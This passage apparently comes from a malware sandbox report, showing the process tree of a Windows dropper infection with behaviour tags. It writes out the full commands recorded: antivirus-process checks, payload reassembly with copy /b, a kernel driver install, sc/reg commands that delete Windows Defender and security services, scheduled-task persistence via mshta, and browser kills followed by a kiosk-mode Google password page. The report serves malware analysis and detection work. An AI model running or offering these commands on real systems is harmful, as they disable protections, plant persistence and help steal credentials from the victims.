- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe"C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe"3⤵
- Executes dropped EXE
PID:2820
-
-
C:\Users\Admin\AppData\Local\Temp\10343420101\kZZeUXM.exe"C:\Users\Admin\AppData\Local\Temp\10343420101\kZZeUXM.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Sake.aiff Sake.aiff.bat & Sake.aiff.bat4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:1796
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵
- System Location Discovery: System Language Discovery
PID:2152
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 5502645⤵
- System Location Discovery: System Language Discovery
PID:3052
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Flexible.aiff5⤵
- System Location Discovery: System Language Discovery
PID:1436
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "CONSEQUENCE" States5⤵
- System Location Discovery: System Language Discovery
PID:2444
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 550264\Isolation.com + Defense + Successful + Palmer + Contacting + Broadcast + Growth + Gods + Jones + Comfort + Dutch + Smith 550264\Isolation.com5⤵
- System Location Discovery: System Language Discovery
PID:2332
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Tutorials.aiff + ..\Tells.aiff + ..\Assists.aiff + ..\Create.aiff + ..\Setting.aiff + ..\Somebody.aiff + ..\Riding.aiff + ..\Avon.aiff + ..\Functions.aiff + ..\Axis.aiff + ..\Singapore.aiff d5⤵
- System Location Discovery: System Language Discovery
PID:1936
-
-
C:\Users\Admin\AppData\Local\Temp\550264\Isolation.comIsolation.com d5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\550264\Isolation.comC:\Users\Admin\AppData\Local\Temp\550264\Isolation.com6⤵PID:1468
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:1564
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10345050101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10345050101\apple.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2528 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1908 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\55ED.tmp\55EE.tmp\55EF.bat C:\Users\Admin\AppData\Local\Temp\22.exe"5⤵PID:2892
-
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe" go6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2024 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\564A.tmp\564B.tmp\564C.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"7⤵
- Drops file in Program Files directory
PID:2928 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:2384
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:2172
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:1072
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:1224
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:1612
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2168
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:968
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:904
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:2120
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:2244
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:2272
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:1396
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:1876
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:448
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:1652
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:2972
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:1412
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:1972
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:1604
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:1284
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:1548
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵PID:892
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:1648
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:952
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:1796
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:744
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:1960
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:1980
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:804
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:1700
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:1480
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:2740
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:828
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:1464
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:2960
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:2196
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:2300
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:3000
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:564
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:2232
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:2428
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:320
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:2532
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:2252
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:680
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:1256
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:1008
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:1856
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:1848
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:1424
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:2380
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:2264
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:2388
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:3048
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:2260
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:2204
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:2072
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:1500
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:1712
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:2088
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:376
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"3⤵
- Executes dropped EXE
PID:2020 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2020 -s 364⤵
- Loads dropped DLL
PID:1928
-
-
-
C:\Users\Admin\AppData\Local\Temp\10346230101\FjbTOQC.exe"C:\Users\Admin\AppData\Local\Temp\10346230101\FjbTOQC.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:2856 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MsWin32tart" /tr "C:\Users\Admin\AppData\Roaming\MsWin32tart.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1132
-
-
-
C:\Users\Admin\AppData\Local\Temp\10346890101\1a69630561.exe"C:\Users\Admin\AppData\Local\Temp\10346890101\1a69630561.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1880
-
-
C:\Users\Admin\AppData\Local\Temp\10346900101\9a696af155.exe"C:\Users\Admin\AppData\Local\Temp\10346900101\9a696af155.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\10346910101\4eb99fd09d.exe"C:\Users\Admin\AppData\Local\Temp\10346910101\4eb99fd09d.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:564 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:2948
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2796 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.0.1708389360\1781966208" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1128 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b2f64ee-2743-4a69-b6aa-01e652df383f} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 1280 4506a58 gpu6⤵PID:2832
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.1.1685531051\1808092621" -parentBuildID 20221007134813 -prefsHandle 1556 -prefMapHandle 1552 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2f08b97-dbc9-4c2c-82b8-ea7c2a6291b0} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 1568 f7ee558 socket6⤵PID:2604
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.2.1805623313\1806228372" -childID 1 -isForBrowser -prefsHandle 2008 -prefMapHandle 2004 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 584 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {040c171a-f7f4-4baf-bd3d-6e080a611c36} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 2020 197c5b58 tab6⤵PID:2108
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.3.1992509518\1159929386" -childID 2 -isForBrowser -prefsHandle 2704 -prefMapHandle 2700 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 584 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b62acf27-2b8b-4a69-8878-62e19e2645ac} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 2716 e5db58 tab6⤵PID:664
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.4.472558662\229891933" -childID 3 -isForBrowser -prefsHandle 3840 -prefMapHandle 3820 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 584 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {467d8b95-c508-4b7f-a9bf-f440bc46a104} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 3852 1f3c5158 tab6⤵PID:1500
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.5.2108453468\575344033" -childID 4 -isForBrowser -prefsHandle 3996 -prefMapHandle 4000 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 584 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5b52a6b-0d43-4e2f-b3a5-57b6baaafb93} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 3984 221e1558 tab6⤵PID:2204
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.6.1046220255\384155804" -childID 5 -isForBrowser -prefsHandle 4172 -prefMapHandle 4176 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 584 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cddd9adb-192f-43d0-b510-44a009823c5e} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 4160 19882858 tab6⤵PID:1684
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10346920101\2333b79a4e.exe"C:\Users\Admin\AppData\Local\Temp\10346920101\2333b79a4e.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
-
C:\Users\Admin\AppData\Local\Temp\10346930101\3865a80d01.exe"C:\Users\Admin\AppData\Local\Temp\10346930101\3865a80d01.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3540
-
-
C:\Users\Admin\AppData\Local\Temp\10346940101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10346940101\EPTwCQd.exe"3⤵PID:3764
-
-
C:\Users\Admin\AppData\Local\Temp\10346950101\oalJJxv.exe"C:\Users\Admin\AppData\Local\Temp\10346950101\oalJJxv.exe"3⤵PID:3908
-
-
C:\Users\Admin\AppData\Local\Temp\10346960101\7b35p_003.exe"C:\Users\Admin\AppData\Local\Temp\10346960101\7b35p_003.exe"3⤵PID:4080
-
-
C:\Users\Admin\AppData\Local\Temp\10346970101\kZZeUXM.exe"C:\Users\Admin\AppData\Local\Temp\10346970101\kZZeUXM.exe"3⤵PID:2400
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Sake.aiff Sake.aiff.bat & Sake.aiff.bat4⤵PID:816
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:3240
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵PID:3864
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:3984
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵PID:3992
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 5502645⤵PID:3584
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Flexible.aiff5⤵PID:3632
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 550264\Isolation.com + Defense + Successful + Palmer + Contacting + Broadcast + Growth + Gods + Jones + Comfort + Dutch + Smith 550264\Isolation.com5⤵PID:3232
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Tutorials.aiff + ..\Tells.aiff + ..\Assists.aiff + ..\Create.aiff + ..\Setting.aiff + ..\Somebody.aiff + ..\Riding.aiff + ..\Avon.aiff + ..\Functions.aiff + ..\Axis.aiff + ..\Singapore.aiff d5⤵PID:3220
-
-
C:\Users\Admin\AppData\Local\Temp\550264\Isolation.comIsolation.com d5⤵PID:3436
-
C:\Users\Admin\AppData\Local\Temp\550264\Isolation.comC:\Users\Admin\AppData\Local\Temp\550264\Isolation.com6⤵PID:3372
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:3492
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10346980101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10346980101\TbV75ZR.exe"3⤵PID:3548
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat4⤵PID:3740
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:3808
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵PID:1224
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:3304
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵PID:3312
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2679785⤵PID:3364
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Spanish.vss5⤵PID:3432
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "East" Removed5⤵PID:3640
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com5⤵PID:3960
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j5⤵PID:3656
-
-
C:\Users\Admin\AppData\Local\Temp\267978\Exam.comExam.com j5⤵PID:908
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:3264
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10346990101\kDveTWY.exe"C:\Users\Admin\AppData\Local\Temp\10346990101\kDveTWY.exe"3⤵PID:3856
-
-
C:\Users\Admin\AppData\Local\Temp\10347000101\FjbTOQC.exe"C:\Users\Admin\AppData\Local\Temp\10347000101\FjbTOQC.exe"3⤵PID:2068
-
-
C:\Users\Admin\AppData\Local\Temp\10347010101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10347010101\7IIl2eE.exe"3⤵PID:2736
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵PID:544
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:3272
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵PID:3420
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:2068
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵PID:1876
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183775⤵PID:848
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab5⤵PID:3408
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation5⤵PID:3356
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com5⤵PID:3884
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N5⤵PID:3972
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N5⤵PID:3568
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:3664
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10347020101\BIm18E9.exe"C:\Users\Admin\AppData\Local\Temp\10347020101\BIm18E9.exe"3⤵PID:4012
-
-
C:\Users\Admin\AppData\Local\Temp\10347030101\WLbfHbp.exe"C:\Users\Admin\AppData\Local\Temp\10347030101\WLbfHbp.exe"3⤵PID:3804
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat4⤵PID:2320
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:920
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵PID:2468
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:3524
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵PID:1204
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2679785⤵PID:2908
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Spanish.vss5⤵PID:3992
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "East" Removed5⤵PID:3080
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com5⤵PID:544
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j5⤵PID:1348
-
-
C:\Users\Admin\AppData\Local\Temp\267978\Exam.comExam.com j5⤵PID:3780
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:1048
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10347050101\43a541325d.exe"C:\Users\Admin\AppData\Local\Temp\10347050101\43a541325d.exe"3⤵PID:3560
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10347050101\43a541325d.exe"4⤵PID:3892
-
-
-
C:\Users\Admin\AppData\Local\Temp\10347060101\8048a7b40b.exe"C:\Users\Admin\AppData\Local\Temp\10347060101\8048a7b40b.exe"3⤵PID:2744
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10347060101\8048a7b40b.exe"4⤵PID:564
-
-
-
C:\Users\Admin\AppData\Local\Temp\10347070101\249b3af78f.exe"C:\Users\Admin\AppData\Local\Temp\10347070101\249b3af78f.exe"3⤵PID:3480
-
-
C:\Users\Admin\AppData\Local\Temp\10347080101\39838cd918.exe"C:\Users\Admin\AppData\Local\Temp\10347080101\39838cd918.exe"3⤵PID:3564
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn bz7fqmaWAyD /tr "mshta C:\Users\Admin\AppData\Local\Temp\4pT74tr5H.hta" /sc minute /mo 25 /ru "Admin" /f4⤵PID:3600
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn bz7fqmaWAyD /tr "mshta C:\Users\Admin\AppData\Local\Temp\4pT74tr5H.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:3688
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\4pT74tr5H.hta4⤵PID:3624
-
